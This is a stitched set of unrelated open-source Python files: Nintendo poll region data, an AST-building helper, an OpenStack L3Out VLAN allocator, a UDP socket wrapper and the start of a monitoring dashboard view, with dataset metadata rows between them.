countries["Japan"] = ["日本", "Japan", "Japan", "Japon", "Japón", "Giappone", "Japan"]
countries["Argentina"] = ["アルゼンチン", "Argentina", "Argentinien", "Argentine", "Argentina", "Argentina", "Argentinië"]
countries["Brazil"] = ["ブラジル", "Brazil", "Brasilien", "Brésil", "Brasil", "Brasile", "Brazilië"]
countries["Canada"] = ["カナダ", "Canada", "Kanada", "Canada", "Canadá", "Canada", "Canada"]
countries["Chile"] = ["チリ", "Chile", "Chile", "Chili", "Chile", "Cile", "Chili"]
countries["Colombia"] = ["コロンビア", "Colombia", "Kolumbien", "Colombie", "Colombia", "Colombia", "Colombia"]
countries["Costa Rica"] = ["コスタリカ", "Costa Rica", "Costa Rica", "Costa Rica", "Costa Rica", "Costa Rica", "Costa Rica"]
countries["Ecuador"] = ["エクアドル", "Ecuador", "Ecuador", "Equateur", "Ecuador", "Ecuador", "Ecuador"]
countries["Guatemala"] = ["グアテマラ", "Guatemala", "Guatemala", "Guatemala", "Guatemala", "Guatemala", "Guatemala"]
countries["Mexico"] = ["メキシコ", "Mexico", "Mexiko", "Mexique", "México", "Messico", "Mexico"]
countries["Panama"] = ["パナマ", "Panama", "Panama", "Panama", "Panamá", "Panamá", "Panama"]
countries["Peru"] = ["ペルー", "Peru", "Peru", "Pérou", "Perú", "Perù", "Peru"]
countries["United States"] = ["アメリカ", "United States", "Vereinigte Staaten", "Etats-Unis d’Amérique", "Estados Unidos de América", "Stati Uniti d'America", "Verenigde Staten"]
countries["Venezuela"] = ["ベネズエラ", "Venezuela", "Venezuela", "Venezuela", "Venezuela", "Venezuela", "Venezuela"]
countries["Australia"] = ["オーストラリア", "Australia", "Australien", "Australie", "Australia", "Australia", "Australië"]
countries["Austria"] = ["オーストリア", "Austria", "Österreich", "Autriche", "Austria", "Austria", "Oostenrijk"]
countries["Belgium"] = ["ベルギー", "Belgium", "Belgien", "Belgique", "Bélgica", "Belgio", "België"]
countries["Denmark"] = ["デンマーク", "Denmark", "Dänemark", "Danemark", "Dinamarca", "Danimarca", "Denemarken"]
countries["Finland"] = ["フィンランド", "Finland", "Finnland", "Finlande", "Finlandia", "Finlandia", "Finland"]
countries["France"] = ["フランス", "France", "Frankreich", "France", "Francia", "Francia", "Frankrijk"]
countries["Germany"] = ["ドイツ", "Germany", "Deutschland", "Allemagne", "Alemania", "Germania", "Duitsland"]
countries["Greece"] = ["ギリシャ", "Greece", "Griechenland", "Grèce", "Grecia", "Grecia", "Griekenland"]
countries["Ireland"] = ["アイルランド", "Ireland", "Irland", "Irlande", "Irlanda", "Irlanda", "Ierland"]
countries["Italy"] = ["イタリア", "Italy", "Italien", "Italie", "Italia", "Italia", "Italië"]
countries["Luxembourg"] = ["ルクセンブルク", "Luxembourg", "Luxemburg", "Luxembourg", "Luxemburgo", "Lussemburgo", "Luxemburg"]
countries["Netherlands"] = ["オランダ", "Netherlands", "Niederlande", "Pays-Bas", "Países Bajos", "Paesi Bassi", "Nederland"]
countries["New Zealand"] = ["ニュージーランド", "New Zealand", "Neuseeland", "Nouvelle-Zélande", "Nueva Zelanda", "Nuova Zelanda", "Nieuw-Zeeland"]
countries["Norway"] = ["ノルウェー", "Norway", "Norwegen", "Norvège", "Noruega", "Norvegia", "Noorwegen"]
countries["Poland"] = ["ポーランド", "Poland", "Polen", "Pologne", "Polonia", "Polonia", "Polen"]
countries["Portugal"] = ["ポルトガル", "Portugal", "Portugal", "Portugal", "Portugal", "Portogallo", "Portugal"]
countries["Spain"] = ["スペイン", "Spain", "Spanien", "Espagne", "España", "Spagna", "Spanje"]
countries["Sweden"] = ["スウェーデン", "Sweden", "Schweden", "Suède", "Suecia", "Svezia", "Zweden"]
countries["Switzerland"] = ["スイス", "Switzerland", "Schweiz", "Suisse", "Suiza", "Svizzera", "Zwitserland"]
countries["United Kingdom"] = ["イギリス", "United Kingdom", "Großbritannien", "Royaume-Uni", "Reino Unido", "Regno Unito", "Verenigd Koninkrijk"]
"""List of country codes."""
country_codes = [1, 10, 16, 18, 20, 21, 22, 25, 30, 36, 40, 42, 49, 52, 65, 66, 67, 74, 76, 77, 78, 79, 82, 83, 88, 94, 95, 96, 97, 98, 105, 107, 108, 110]
"""These lists tell the script how many entries are used for the position tables."""
"""(if it's more than 1, that must mean the region is split up into multiple parts)"""
position_table = collections.OrderedDict()
position_table[1] = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2]
position_table[16] = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1]
position_table[18] = [1, 1, 2, 1, 1, 3, 1, 1, 1, 1, 1, 4, 3]
position_table[21] = [1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0]
position_table[36] = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
position_table[40] = [2, 0, 1, 1, 1, 0, 0, 1, 1, 2]
position_table[49] = [1, 3, 1, 1, 1, 1, 1, 1, 1, 1, 1, 3, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
position_table[77] = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0]
position_table[78] = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
position_table[83] = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
position_table[94] = [1, 1, 1, 3, 1, 1, 1, 1, 1, 2, 1, 1]
position_table[105] = [1, 1, 1, 1, 3, 5, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
position_table[110] = [1, 2, 2, 1, 1]
"""Data for the position table. Nintendo mixed these up to match the order votes were submitted in (I think)."""
"""That would be more effort to re-arrange the data in the position table, so I just made it read the values only if there is any votes for the region."""
position_data = collections.OrderedDict()
position_data[1] = "A2A4C828AF52B964B478AA64AA73AA87AD9BA5969B96A09EADA5A2A987947F8E78A096A5919B9B8782A591AF82AF7AB978AA6EAA6DB364AF73B96BC05AA546AA55AF4BB437B95FC358BA46C350C82DBE26C623CD2DD237C837D728E14849395A"
position_data[16] = "A4862664E8648E1E4141C873D746CD9E7DA0B4467878B99B8746E35385BEC855C2AEE94D82DC4B6996C8A5AAE3699687E15AA064"
position_data[18] = "87BE3CA009981EA064AAC8C3F0A8E1AAC89BD7C3D4BDAAAA50AF1E695C405649505A3C787841647D8E89"
position_data[21] = "7C7D78739BC8695AAA5A71247D468D6B6E6E579887326946969BC896649B9119782D8C8C4BA58D4864B2677B647328194E19875A733E6E825A87"
position_data[36] = "37508FB0786914465A5A69A54B7D98B69B9E8AAF9687E6A07DAF82918C787DA2649B91B476988BA1EBAA5F7D8CBE91A52B6F67B2A5C8C8C899AE738CC8B9D7B4"
position_data[40] = "A05DAF7B1E7373737D5A739BAA5250823AA0"
position_data[49] = "D25E78D252E748E1AA87917D3C7819645A64E04EDC5FC8A0BE872EE628DF18D98C5A3C46A064AA5F7869B46C9191E249DC64EB37A53FAF5087419169A08C5037D2737337735AE440DC55557D2D5AD746E254B95D7D7D2341CD55E84CC87D714BAA7878914164CD69DC3F272F9B46C3645550F0BE"
position_data[77] = "8246DC465AB49196463CA06E28467864AA46E6E6C86E6E3296C87896C84678C88C14505A8C2D508CC8C8BE96"
position_data[78] = "B95A64966EDC9BC8C86E5F417837AF2D7350467841AA3CBEBE919664781E8C8C"
position_data[83] = "7D822328283C324B463264196432821E64466464786E82649682A08CA0A0BE96B9AABEBE96E63CB4"
position_data[94] = "645AC8418C6496288214B40AAA82D223BE08A0C882B4B46E32C8788232C8"
position_data[105] = "6E5F64E6A03C3C1EF852E65FCA739AD9A7E6B4E1C8E6EBE1641E7878503CC832AA73468C1E32A0968C28781E7832"
position_data[110] = "B4B4738732E67846D71E82B4507D"
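# Each entry in position_data above packs one X byte followed by one Y byte
# per region part. A minimal decoding sketch (assumption: the hex string is a
# flat sequence of X/Y byte pairs; the helper name is ours, not Nintendo's):
import binascii

def decode_position_data(hex_string):
    raw = bytearray(binascii.unhexlify(hex_string))
    return [(raw[i], raw[i + 1]) for i in range(0, len(raw), 2)]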
"""Number of regions for each country."""
region_number = collections.OrderedDict()
region_number[1] = 47
region_number[10] = 24
region_number[16] = 27
region_number[18] = 13
region_number[20] = 13
region_number[21] = 33
region_number[22] = 7
region_number[25] = 22
region_number[30] = 22
region_number[36] = 32
region_number[40] = 10
region_number[42] = 25
region_number[49] = 52
region_number[52] = 25
region_number[65] = 8
region_number[66] = 9
region_number[67] = 3
region_number[74] = 17
region_number[76] = 6
region_number[77] = 26
region_number[78] = 16
region_number[79] = 13
region_number[82] = 8
region_number[83] = 20
region_number[88] = 3
region_number[94] = 12
region_number[95] = 13
region_number[96] = 5
region_number[97] = 16
region_number[98] = 7
region_number[105] = 17
region_number[107] = 21
region_number[108] = 23
region_number[110] = 5
language_num = collections.OrderedDict()
language_num[0] = "Japanese"
language_num[1] = "English"
language_num[2] = "German"
language_num[3] = "French"
language_num[4] = "Spanish"
language_num[5] = "Italian"
language_num[6] = "Dutch"
language_num[7] = "Portuguese"
language_num[8] = "French Canada"
"""Languages each country uses. The numbers correspond to the ones in the dictionary above."""
country_language = collections.OrderedDict()
country_language[1] = [1]
country_language[10] = [1, 4, 8]
country_language[16] = [1, 4, 7, 8]
country_language[18] = [1, 4, 8]
country_language[20] = [1, 4, 8]
country_language[21] = [1, 4, 8]
country_language[22] = [1, 4, 8]
country_language[25] = [1, 4, 8]
country_language[30] = [1, 4, 8]
country_language[36] = [1, 4, 8]
country_language[40] = [1, 4, 8]
country_language[42] = [1, 4, 8]
country_language[49] = [1, 4, 8]
country_language[52] = [1, 4, 8]
country_language[65] = [1]
country_language[66] = [2, 3, 5, 6]
country_language[67] = [2, 3, 5, 6]
country_language[74] = [1]
country_language[76] = [1]
country_language[77] = [3]
country_language[78] = [2]
country_language[79] = [1, 4, 7]
country_language[82] = [1]
country_language[83] = [5]
country_language[88] = [2, 3, 5, 6]
country_language[94] = [6]
country_language[95] = [1]
country_language[96] = [1]
country_language[97] = [1]
country_language[98] = [1, 4, 7]
country_language[105] = [4]
country_language[107] = [1]
country_language[108] = [2, 3, 5, 6]
country_language[110] = [1]
category_text = collections.OrderedDict()
category_text[0] = "Thoughts"
category_text[1] = "Personality"
category_text[2] = "Surroundings"
category_text[3] = "Experience"
category_text[4] = "Knowledge"
"""Poll categories. The keys correspond to the ones above."""
categories = collections.OrderedDict()
categories[0] = 3
categories[1] = 5
categories[2] = 7
categories[3] = 9
categories[4] = 10
| agpl-3.0 | -2,446,450,334,709,106,700 | 51.046632 | 254 | 0.676755 | false | 2.138144 | false | false | false |
ztane/Tonnikala | tonnikala/astutil/__init__.py | 1 | 7620 | import ast
NoneValue = object()
mappednames = [
False,
True,
NotImplemented,
Ellipsis
]
try:
basestring
except:
basestring = (str, bytes)
numbers = (int, float)
def coerce(obj):
if any(i is obj for i in mappednames):
return Name(str(obj))
if obj is NoneValue:
return Name('None')
if isinstance(obj, basestring):
return Str(obj)
if isinstance(obj, numbers):
return Num(obj)
if isinstance(obj, list):
return List(obj)
if isinstance(obj, dict):
return Dict(obj)
if isinstance(obj, tuple):
return Tuple(obj)
return obj
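# Coercion examples (illustrative):
#   coerce(True)     -> Name('True')
#   coerce('hi')     -> Str('hi')
#   coerce([1, 2])   -> List([Num(1), Num(2)])
#   coerce({'a': 1}) -> Dict({Str('a'): Num(1)})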
def coerce_list(obj):
return [ coerce(i) for i in obj ]
def coerce_dict(obj, valuesonly=False):
kcoerce = coerce
if valuesonly:
kcoerce = lambda x: x
return { kcoerce(k): coerce(v) for (k, v) in obj.items() }
def maybe_ast(obj):
if obj is None:
return
return obj._get_ast()
def _get_list_ast(obj):
return [ i._get_ast() for i in obj ]
class AstNode(object):
def _make_lvalue(self):
raise TypeError("Cannot make an lvalue of %s (non-expression)" % self.__class__.__name__)
class Expression(AstNode):
def __call__(self, *a, **kw):
return Call(self, *a, **kw)
def _assign(self, value):
return Assign(self, value)
def __getattr__(self, name):
return Attribute(self, name)
def _make_lvalue(self):
raise TypeError("Cannot make an lvalue of %s" % self.__class__.__name__)
class Statement(AstNode):
pass
def make_statement(node):
if isinstance(node, Expression):
return Expr(node)
return node
class Expr(Statement):
def __init__(self, value):
self.value = coerce(value)
def _get_ast(self):
return ast.Expr(self.value._get_ast())
class Num(Expression):
def __init__(self, n=None):
self.n = n
def _get_ast(self):
return ast.Num(self.n)
class Str(Expression):
def __init__(self, s=None):
self.s = s
def _get_ast(self):
return ast.Str(s=self.s)
class Assign(Statement):
def __init__(self, target, source):
self.target = target._make_lvalue()
self.source = coerce(source)
def _get_ast(self):
return ast.Assign(
[ self.target._get_ast() ],
self.source._get_ast()
)
class Call(Expression):
def __init__(self, func, *a, **kw):
self.func = func
self.a = None
self.kw = None
if '_kwargs' in kw:
self.kw = coerce_dict(kw.pop('_kwargs'))
if '_args' in kw:
self.a = coerce_list(kw.pop('_args'))
self.args = coerce_list(a)
self.kwargs = coerce_dict(kw, valuesonly=True)
def _get_ast(self):
kwlist = []
for k, v in self.kwargs.items():
kwlist.append(ast.keyword(
arg=k,
value=v._get_ast()
))
return ast.Call(
func=self.func._get_ast(),
args=_get_list_ast(self.args),
keywords=kwlist,
            starargs=maybe_ast(self.a),
            kwargs=maybe_ast(self.kw)
)
ctx_type_to_factory = {
'load': ast.Load,
'store': ast.Store
}
class Name(Expression):
def __init__(self, id=None, ctx='load'):
if not isinstance(id, str):
id = id.decode('UTF-8')
self.name = id
self.ctx = ctx
def _make_lvalue(self):
return Name(id=self.name, ctx='store')
def _get_ast(self):
ctx = ctx_type_to_factory[self.ctx]()
return ast.Name(self.name, ctx)
class Attribute(Expression):
def __init__(self, value=None, attr=None, ctx='load'):
self.value = coerce(value)
self.attr = attr
self.ctx = ctx
def _make_lvalue(self):
return Attribute(self.value, self.attr, 'store')
def _get_ast(self):
ctx = ctx_type_to_factory[self.ctx]()
return ast.Attribute(self.value._get_ast(), self.attr, ctx)
class Dict(Expression):
def __init__(self, value=None):
value = value or {}
keys = []
values = []
for k, v in value.items():
keys.append(k)
values.append(v)
self.keys = coerce_list(keys)
self.values = coerce_list(values)
def _get_ast(self):
return ast.Dict(_get_list_ast(self.keys), _get_list_ast(self.values))
class Tuple(Expression):
def __init__(self, value=None, ctx='load'):
value = list(value) or []
self.values = coerce_list(value)
self.ctx = ctx
def _get_ast(self):
ctx = ctx_type_to_factory[self.ctx]()
return ast.Tuple(_get_list_ast(self.values), ctx)
def _make_lvalue(self):
return Tuple([ i._make_lvalue() for i in self.values ], 'store')
class List(Expression):
def __init__(self, value=None, ctx='load'):
value = value or []
self.values = coerce_list(value)
self.ctx = ctx
def _get_ast(self):
ctx = ctx_type_to_factory[self.ctx]()
return ast.List(_get_list_ast(self.values), ctx)
def _make_lvalue(self):
return List([ i._make_lvalue() for i in self.values ], 'store')
try:
from collections.abc import MutableSequence
except ImportError:
from collections import MutableSequence
class StatementList(MutableSequence):
def __init__(self, initial=None):
self.list = []
if initial:
self += initial
def coerce(self, o):
return make_statement(o)
def __getitem__(self, i):
return self.list[i]
def __setitem__(self, i, v):
self.list[i] = self.coerce(v)
def __delitem__(self, i):
del self.list[i]
def __len__(self):
return len(self.list)
def insert(self, i, o):
return self.list.insert(i, self.coerce(o))
def __iadd__(self, value):
if isinstance(value, AstNode):
self.append(value)
else:
super(StatementList, self).__iadd__(value)
return self
class For(Statement):
def __init__(self, vars=None, iterable=None, body=[], orelse=[]):
self.body = StatementList(body)
self.orelse = StatementList(orelse)
self.vars = vars
self.iterable = coerce(iterable)
@property
def vars(self):
return self._vars
@vars.setter
def vars(self, value):
if value is not None:
value = coerce(value)._make_lvalue()
self._vars = value
def _get_ast(self):
return ast.For(
self._vars._get_ast(),
self.iterable._get_ast(),
_get_list_ast(self.body),
_get_list_ast(self.orelse)
)
class If(Statement):
def __init__(self, condition=None, body=[], orelse=[]):
self.body = StatementList(coerce_list(body))
self.orelse = StatementList(coerce_list(orelse))
self.condition = coerce(condition)
def _get_ast(self):
return ast.If(
self.condition._get_ast(),
_get_list_ast(self.body),
_get_list_ast(self.orelse)
)
class Return(Statement):
def __init__(self, expression=None):
self.expression = coerce(expression)
def _get_ast(self):
return ast.Return(self.expression._get_ast())
if __name__ == '__main__':
forri = For(Name('a'), [ 1, 2, 3 ])
forri.body += Name('print')(Name('a'))
iffi = If(True)
iffi.body += forri
tree = iffi._get_ast()
print(ast.dump(tree))
import astor
print(astor.codegen.to_source(tree))
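    # Expected output from the two prints above, roughly (exact formatting
    # depends on the installed astor version):
    #   if True:
    #       for a in [1, 2, 3]:
    #           print(a)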
| apache-2.0 | -4,026,238,387,926,721,500 | 21.280702 | 97 | 0.559449 | false | 3.485819 | false | false | false |
noironetworks/apic-ml2-driver | apic_ml2/neutron/db/l3out_vlan_allocation.py | 1 | 10929 | # Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log
from six import moves
import sqlalchemy as sa
from neutron._i18n import _LE, _LI, _LW
from neutron.common import exceptions as exc
from neutron.db import api as db_api
from neutron.db import model_base
from neutron.plugins.common import constants as p_const
from neutron.plugins.common import utils as plugin_utils
from neutron.plugins.ml2.drivers import helpers
LOG = log.getLogger(__name__)
class L3OutVlanAllocation(model_base.BASEV2):
"""Represent allocation state of a vlan_id for the L3 out per VRF.
If allocated is False, the vlan_id is available for allocation.
If allocated is True, the vlan_id is in use.
When an allocation is released, if the vlan_id is inside the pool
described by network_vlan_ranges, then allocated is set to
False. If it is outside the pool, the record is deleted.
"""
__tablename__ = 'apic_ml2_l3out_vlan_allocation'
__table_args__ = (
sa.Index('apic_ml2_l3out_vlan_allocation_l3out_network_allocated',
'l3out_network', 'allocated'),
model_base.BASEV2.__table_args__,)
l3out_network = sa.Column(sa.String(64), nullable=False,
primary_key=True)
vrf = sa.Column(sa.String(64), nullable=False,
primary_key=False)
vlan_id = sa.Column(sa.Integer, nullable=False, primary_key=True,
autoincrement=False)
allocated = sa.Column(sa.Boolean, nullable=False)
class NoVlanAvailable(exc.ResourceExhausted):
message = _("Unable to allocate the vlan. "
"No vlan is available for %(l3out_network)s external network")
# inherit from SegmentTypeDriver to reuse the code to reserve/release
# vlan IDs from the pool
class L3outVlanAlloc(helpers.SegmentTypeDriver):
def __init__(self):
super(L3outVlanAlloc, self).__init__(L3OutVlanAllocation)
def _parse_vlan_ranges(self, ext_net_dict):
self.l3out_vlan_ranges = {}
for l3out_network in ext_net_dict.keys():
try:
ext_info = ext_net_dict.get(l3out_network)
vlan_ranges_str = ext_info.get('vlan_range')
if vlan_ranges_str:
vlan_ranges = vlan_ranges_str.strip().split(',')
for vlan_range_str in vlan_ranges:
vlan_min, vlan_max = vlan_range_str.strip().split(':')
vlan_range = (int(vlan_min), int(vlan_max))
plugin_utils.verify_vlan_range(vlan_range)
self.l3out_vlan_ranges.setdefault(
l3out_network, []).append(vlan_range)
except Exception:
LOG.exception(_LE("Failed to parse vlan_range for L3out %s"),
l3out_network)
LOG.info(_LI("L3out VLAN ranges: %s"), self.l3out_vlan_ranges)
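        # Example ext_net_dict entry consumed above (hypothetical):
        #   {'ext-net-1': {'vlan_range': '100:199, 300:350'}}
        # which yields self.l3out_vlan_ranges ==
        #   {'ext-net-1': [(100, 199), (300, 350)]}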
def sync_vlan_allocations(self, ext_net_dict):
session = db_api.get_session()
self._parse_vlan_ranges(ext_net_dict)
with session.begin(subtransactions=True):
# get existing allocations for all L3 out networks
allocations = dict()
allocs = (session.query(L3OutVlanAllocation).
with_lockmode('update'))
for alloc in allocs:
if alloc.l3out_network not in allocations:
allocations[alloc.l3out_network] = set()
allocations[alloc.l3out_network].add(alloc)
# process vlan ranges for each configured l3out network
for (l3out_network,
vlan_ranges) in self.l3out_vlan_ranges.items():
# determine current configured allocatable vlans for
# this l3out network
vlan_ids = set()
for vlan_min, vlan_max in vlan_ranges:
vlan_ids |= set(moves.xrange(vlan_min, vlan_max + 1))
# remove from table unallocated vlans not currently
# allocatable
if l3out_network in allocations:
for alloc in allocations[l3out_network]:
try:
# see if vlan is allocatable
vlan_ids.remove(alloc.vlan_id)
except KeyError:
# it's not allocatable, so check if its allocated
if not alloc.allocated:
# it's not, so remove it from table
LOG.debug("Removing vlan %(vlan_id)s on "
"l3out network "
"%(l3out_network)s from pool",
{'vlan_id': alloc.vlan_id,
'l3out_network':
l3out_network})
session.delete(alloc)
del allocations[l3out_network]
# add missing allocatable vlans to table
for vlan_id in sorted(vlan_ids):
alloc = L3OutVlanAllocation(l3out_network=l3out_network,
vrf='',
vlan_id=vlan_id,
allocated=False)
session.add(alloc)
# remove from table unallocated vlans for any unconfigured
# l3out networks
            for allocs in allocations.values():
for alloc in allocs:
if not alloc.allocated:
LOG.debug("Removing vlan %(vlan_id)s on l3out "
"network %(l3out_network)s from pool",
{'vlan_id': alloc.vlan_id,
'l3out_network':
alloc.l3out_network})
session.delete(alloc)
def get_type(self):
return p_const.TYPE_VLAN
def reserve_vlan(self, l3out_network, vrf, vrf_tenant=None):
vrf_db = L3outVlanAlloc._get_vrf_name_db(vrf, vrf_tenant)
session = db_api.get_session()
with session.begin(subtransactions=True):
query = (session.query(L3OutVlanAllocation).
filter_by(l3out_network=l3out_network,
vrf=vrf_db))
count = query.update({"allocated": True})
if count:
LOG.debug("reserving vlan %(vlan_id)s for vrf "
"%(vrf)s on l3out network %(l3out_network)s from "
"pool. Totally %(count)s rows updated.",
{'vlan_id': query[0].vlan_id,
'vrf': vrf_db,
'l3out_network': l3out_network,
'count': count})
return query[0].vlan_id
# couldn't find this vrf, allocate vlan from the pool
# then update the vrf field
filters = {}
filters['l3out_network'] = l3out_network
alloc = self.allocate_partially_specified_segment(
session, **filters)
if not alloc:
raise NoVlanAvailable(l3out_network=l3out_network)
filters['vlan_id'] = alloc.vlan_id
query = (session.query(L3OutVlanAllocation).
filter_by(allocated=True, **filters))
count = query.update({"vrf": vrf_db})
if count:
LOG.debug("updating vrf %(vrf)s vlan "
"%(vlan_id)s on l3out network %(l3out_network)s to "
"pool. Totally %(count)s rows updated.",
{'vrf': vrf_db,
'vlan_id': alloc.vlan_id,
'l3out_network': l3out_network,
'count': count})
LOG.debug("reserving vlan %(vlan_id)s "
"on l3out network %(l3out_network)s from pool",
{'vlan_id': alloc.vlan_id,
'l3out_network': l3out_network})
return alloc.vlan_id
def release_vlan(self, l3out_network, vrf, vrf_tenant=None):
vrf_db = L3outVlanAlloc._get_vrf_name_db(vrf, vrf_tenant)
session = db_api.get_session()
with session.begin(subtransactions=True):
query = (session.query(L3OutVlanAllocation).
filter_by(l3out_network=l3out_network,
vrf=vrf_db))
count = query.update({"allocated": False})
if count:
LOG.debug("Releasing vlan %(vlan_id)s on l3out "
"network %(l3out_network)s to pool. "
"Totally %(count)s rows updated.",
{'vlan_id': query[0].vlan_id,
'l3out_network': l3out_network,
'count': count})
return
LOG.warning(_LW("No vlan_id found for vrf %(vrf)s on l3out "
"network %(l3out_network)s"),
{'vrf': vrf_db,
'l3out_network': l3out_network})
# None is returned if not found
@staticmethod
def get_vlan_allocated(l3out_network, vrf, vrf_tenant=None):
session = db_api.get_session()
query = (session.query(L3OutVlanAllocation).
filter_by(l3out_network=l3out_network,
vrf=L3outVlanAlloc._get_vrf_name_db(
vrf, vrf_tenant),
allocated=True))
if query.count() > 0:
return query[0].vlan_id
@staticmethod
def _get_vrf_name_db(vrf, vrf_tenant):
return vrf_tenant and ("%s/%s" % (vrf_tenant, vrf)) or vrf
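    # e.g. _get_vrf_name_db('vrf1', 'tenantA') -> 'tenantA/vrf1'
    #      _get_vrf_name_db('vrf1', None)      -> 'vrf1'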
def initialize(self):
return
def is_partial_segment(self, segment):
return True
def validate_provider_segment(self, segment):
return
def reserve_provider_segment(self, session, segment):
return
def allocate_tenant_segment(self, session):
return
def release_segment(self, session, segment):
return
| apache-2.0 | 1,540,721,351,962,109,700 | 42.027559 | 78 | 0.529875 | false | 4.274149 | false | false | false |
awalkaradi95moc/pfioh | pfioh/dgmsocket.py | 1 | 3029 | #!/usr/bin/env python3
#
# NAME
#
# dgmsocket class
#
# DESCRIPTION
#
# The 'dgmsocket' class provides a very simple wrapper the standard
# python socket API.
#
# More specifically, this class provides datagram socket services.
#
# HISTORY
#
# 25 March 2006
# o Initial development implementation
#
# 06 December 2011
# o Clean-up the socket communication
#
import socket
class C_dgmsocket :
#
# Member variables
#
# - Core variables
mstr_obj = 'C_dgmsocket' # name of object class
mstr_name = 'void' # name of object variable
m_id = -1 # id of agent
m_iter = 0 # current iteration in an
# arbitrary processing
# scheme
m_verbosity = 0 # debug related value for
# object
m_warnings = 0 # show warnings
# (and warnings level)
#
# - Class variables
m_dgmsocket = None
mstr_remoteHost = 'localhost'
m_port = 1701
#
# Methods
#
# Core methods - construct, initialise, id
def core_construct( self,
astr_obj = 'C_dgmsocket',
astr_name = 'void',
a_id = -1,
a_iter = 0,
a_verbosity = 0,
a_warnings = 0) :
self.mstr_obj = astr_obj
self.mstr_name = astr_name
self.m_id = a_id
self.m_iter = a_iter
self.m_verbosity = a_verbosity
self.m_warnings = a_warnings
def __str__(self):
print('mstr_obj\t\t= %s' % self.mstr_obj)
print('mstr_name\t\t= %s' % self.mstr_name)
print('m_id\t\t\t= %d' % self.m_id)
print('m_iter\t\t\t= %d' % self.m_iter)
print('m_verbosity\t\t= %d' % self.m_verbosity)
print('m_warnings\t\t= %d' % self.m_warnings)
return 'This class provides a *very* simple wrapper framework about datagram sockets.'
def __init__(self, astr_hostname = 'localhost', a_port = 1701):
self.core_construct()
self.mstr_remoteHost = astr_hostname
self.m_port = a_port
self.m_dgmsocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def tx(self, str_payload):
self.m_dgmsocket.sendto(str_payload.encode(), (self.mstr_remoteHost, self.m_port))
def write(self, str_payload):
self.m_dgmsocket.sendto(str_payload.encode(), (self.mstr_remoteHost, self.m_port))
def close(self):
self.m_dgmsocket.close()
def flush(self):
pass
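if __name__ == '__main__':
    # Minimal usage sketch: UDP is connectionless, so this runs even without
    # a listener on localhost:1701 (host and port are illustrative).
    dgm = C_dgmsocket('localhost', 1701)
    dgm.tx('hello from C_dgmsocket')
    dgm.close()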
| mit | -1,144,093,641,679,235,300 | 31.923913 | 102 | 0.468141 | false | 3.734895 | false | false | false |
openstack/monasca-ui | monitoring/overview/views.py | 1 | 16561 | # Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import base64
import copy
import json
import logging
from django.conf import settings
from django.contrib import messages
from django import http
from django.http import HttpResponse
from django.urls import reverse_lazy
from django.utils.translation import ugettext_lazy as _ # noqa
from django.views.decorators.csrf import csrf_exempt
from django.views import generic
from django.views.generic import TemplateView
from horizon import exceptions
from openstack_auth import utils as auth_utils
from openstack_dashboard import policy
import urllib.error
import urllib.parse
import urllib.request
from monitoring.alarms import tables as alarm_tables
from monitoring import api
from monitoring.overview import constants
LOG = logging.getLogger(__name__)
STATUS_FA_ICON_MAP = {'btn-success': "fa-check",
'btn-danger': "fa-exclamation-triangle",
'btn-warning': "fa-exclamation",
'btn-default': "fa-question-circle"}
def get_icon(status):
return STATUS_FA_ICON_MAP.get(status, "fa-question-circle")
priorities = [
{'status': 'btn-success', 'severity': 'OK'},
{'status': 'btn-default', 'severity': 'UNDETERMINED'},
{'status': 'btn-warning', 'severity': 'LOW'},
{'status': 'btn-warning', 'severity': 'MEDIUM'},
{'status': 'btn-warning', 'severity': 'HIGH'},
{'status': 'btn-danger', 'severity': 'CRITICAL'},
]
index_by_severity = {d['severity']: i for i, d in enumerate(priorities)}
def get_dashboard_links(request):
#
# GRAFANA_LINKS is a list of dictionaries, but can either
# be a nested list of dictionaries indexed by project name
# (or '*'), or simply the list of links to display. This
# code is a bit more complicated as a result but will allow
# for backward compatibility and ensure existing installations
# that don't take advantage of project specific dashboard
# links are unaffected. The 'non_project_keys' are the
# expected dictionary keys for the list of dashboard links,
# so if we encounter one of those, we know we're supporting
# legacy/non-project specific behavior.
#
# See examples of both in local_settings.py
#
non_project_keys = {'fileName', 'title'}
try:
for project_link in settings.DASHBOARDS:
key = list(project_link)[0]
value = list(project_link.values())[0]
if key in non_project_keys:
#
# we're not indexed by project, just return
# the whole list.
#
